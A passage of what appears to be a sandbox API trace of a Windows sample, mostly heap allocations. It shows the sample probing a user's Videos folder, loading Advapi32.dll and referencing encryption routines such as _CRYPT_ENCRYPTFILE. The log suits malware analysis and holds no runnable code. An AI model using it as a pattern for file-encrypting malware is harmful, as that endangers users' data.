wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0096.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0096.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0096.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0096.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0096.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0096.642] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0096.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0096.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0096.642] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0096.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0096.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0096.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0096.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0096.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0096.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0096.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2170 [0096.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0096.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c68 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0096.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0096.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0096.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0096.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0096.645] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0096.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0096.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0096.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0096.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0096.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0096.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0096.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0096.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0096.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0096.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0096.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0096.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0096.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0096.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0096.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0096.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0096.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0096.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0096.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0096.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0096.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0096.647] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac500 [0096.647] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0096.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0096.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0096.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0096.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0096.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0096.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0096.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.648] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0096.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0096.648] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0096.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0096.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f98 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0096.649] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0096.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0096.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ef0 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0096.649] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0096.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0096.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0096.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0096.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0096.650] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0096.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0096.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.650] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0096.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0096.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0096.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0096.651] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.651] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0096.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0096.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0096.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0096.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 